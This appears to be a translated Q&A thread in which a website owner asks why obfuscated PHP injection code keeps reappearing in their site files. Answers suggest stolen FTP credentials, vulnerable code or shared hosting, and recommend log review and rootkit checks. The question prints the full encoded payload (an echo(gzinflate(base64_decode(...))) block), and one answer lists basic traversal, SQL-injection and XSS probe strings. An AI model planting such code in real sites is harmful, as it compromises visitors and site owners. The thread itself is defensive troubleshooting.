1

我的网站不断被以下代码感染。我一直在删除它,也许有一天它会再次出现。请帮忙。

#d93065#
echo(gzinflate(base64_decode("tVXbjptADP2VNi+BRmmZgbkglr70E/qIeIgTyLLahhRQ0CrKv9c2QzbZknRVaZWLPB7P8bF9Bh7adVPtu+9VGiRd83LcN3VXdy/7IjmtV9360Su2Rb9tN/6xTLP5MpRAPx2BFrCMYSlAxWACUBaMBm1BB6DRo0CBlrRCU6Lb8M7FvolAKrABRCEoTcGhYYNjEHgpQRnGjikMl2giHiiyLDJB3JHRKysTvqKgjUABCHsVbCPiTkwM0aB08RTg7dKMJWxMiCvH1oCIJyggMqYgjwXJVeiQy8evAIFtwQ/WaQc2hiH4vKJThrct8SCT01sQzEEwFDeKslg6qjgC/UMuPOi20UX8I54KM3gbYbiagQeGDtsDIWpSRCzpvHF1YyTRD11aFbsGYbORFBGOxg5FtKQtnrDirpuhYO1aKM4aEeTBSMNIipHE2YGcpOBWTzRb8hwm532xpEPcS2Wv2C3jOxKakIfhaiggdtdB8rxvy0YNsgn4HJc9eTUG8U9oSQ61oVs54dIco1FPoZvSuakD0Fl/aIcfpcArYpc6Uv/Q0PlSvJEROm8j3tDXgHVLYvcQL7XnlH+fwajL6eD3Tub6zo7zcXfyf2b99zWfAn3/g+4Dn+GKb4FgFTEgxkjtlIC5FL9e9OTze55nQf613T9XnTeHuZ8c0lkxW8wOK/x7niWnqvQOfpH21W5T99kh55fbrug/CanGV9vvfusf+7RM2jTLk1OT/uyaardNyrrxEqXN57RKqkUq/OMTWaVX+G3aLppsVmKWBn/1rx/4/7gim6x6U8xyr8+e8i9iEQmfeRR+4bV+8vDNvWr/AA==")));
#/d93065#

编辑:如果再次发生,有什么方法可以找出代码是如何产生的。可能是来自提供商还是什么?我还不得不说,我所有的帐户都被感染了,而不仅仅是一个。

4

4 回答 4

3

我的建议是您的 FTP 帐户已被盗用。更改您的 FTP 密码,不要将其存储在任何地方,清理您的网络并等待它是否有帮助。如果您将 FTP 密码存储在计算机中,请仔细检查是否存在病毒/恶意软件。某些恶意软件可能会抓取您存储在 Total Commander 的 FTP 帐户列表中的 FTP 密码。

于 2012-04-27T08:20:23.153 回答
2

检查您的 php 代码。它的某处可能存在一些漏洞,允许攻击者修改您的文件。或者您的网络服务器可能容易受到攻击。

它回来的原因是因为有人(或机器人/脚本)反复这样做,而您没有保护运行应用程序的所有部分,即服务器 + 代码。

就像@pomeh 建议的那样,监视您的服务器日志以查看正在访问哪些文件以了解它是如何发生的。

于 2012-04-27T08:18:13.910 回答
0

您的网站可能已受到攻击。而且由于您不修复打开的“漏洞”,攻击者可以一次又一次地注入代码。

于 2012-04-27T08:19:30.240 回答
0

我将从检查服务器日志和 ftp 日志开始,这应该可以提示您问题出在哪里。我的猜测是您的网站遭到入侵,并且用户留下了一个简单的 php shell 以供进一步访问,这是大多数情况下的情况。这可以通过查看日志来发现;这可能有点及时,并且需要一个至少在寻找什么方面没有经验的人(例如遍历包含尝试 - ../,sql注入尝试 - and 1=1,xss -<script>alert,这些只是最基本的例子)。但是,如果存在更严重的入侵,则发现将更加困难,因为该人将能够通过摆脱日志来掩盖他的踪迹,因此为了安全起见,我可能还会检查 rootkit。此外,这取决于您是否在共享主机上,在这种情况下,服务器权限混乱可能会导致您的网站由于另一个网站受到攻击而易受攻击。很多网站都以这种方式受到攻击,大多数中小型托管服务提供商在这方面没有提供足够的安全性,基本上使您的网站只能与服务器上托管的最不安全的网站一样安全。正如在其他答案中所说,如果您使用开源解决方案,请通过 google 或例如http://www.exploit-db.com/如果最近发布了任何漏洞。最后,您可能想要检查服务器及其正在运行的服务。

于 2012-04-27T15:19:20.853 回答